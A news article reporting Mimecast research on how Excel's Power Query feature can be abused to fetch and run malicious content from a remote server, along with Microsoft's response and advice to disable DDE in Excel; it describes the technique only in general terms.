Security researchers have devised a method to abuse a legitimate Microsoft Excel technology named Power Query to run malicious code on users’ systems with minimal interaction.
Power Query is a data connection technology that can allow Excel files to discover, connect, combine, and manipulate data before importing it from remote sources, such as an external database, text document, another spreadsheet, or a web page.
The tool is included with recent versions of Excel and available as a separate downloadable add-in for older Excel versions.
In research published today and shared with ZDNet, Ofir Shlomo, a security researcher with the Mimecast Threat Center, described a technique through which Power Query features could be abused to run malicious code on users’ systems.
The technique relies on creating malformed Excel documents that use Power Query to import data from an attacker’s remote server.
“Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened,” Shlomo said. “The malicious code could be used to drop and execute malware that can compromise the user’s machine.”
Mimecast’s technique can even bypass security sandboxes that analyze documents sent via email before allowing users to download and open them.
Disabling DDE stops attacks
The Power Query technique is eerily similar to a similar malware distribution method detailed in 2017 by SensePost, which abused another Excel feature for importing data in Excel files, namely Dynamic Data Exchange (DDE).
Mimecast said they contacted Microsoft about the attack vector they found, but just like in the case of DDE, Microsoft declined to patch the issue, since it wasn’t actually a vulnerability in the way the feature was designed, but just bad actors abusing a legitimate feature to do bad things.
Furthermore, Microsoft said that by disabling DDE support in Excel, users should also be protected against attacks abusing Power Query, which has been built to work on top of DDE in the first place.
In December 2017, Microsoft disabled DDE support in Word by default but left the feature active in Excel, where it’s most likely to be used for legitimate purposes, other than malware distribution.
Instructions on how to disable DDE in Excel are available in Microsoft’s KB4053440 advisory.
Article updated at 4am ET with link to Mimecast’s research.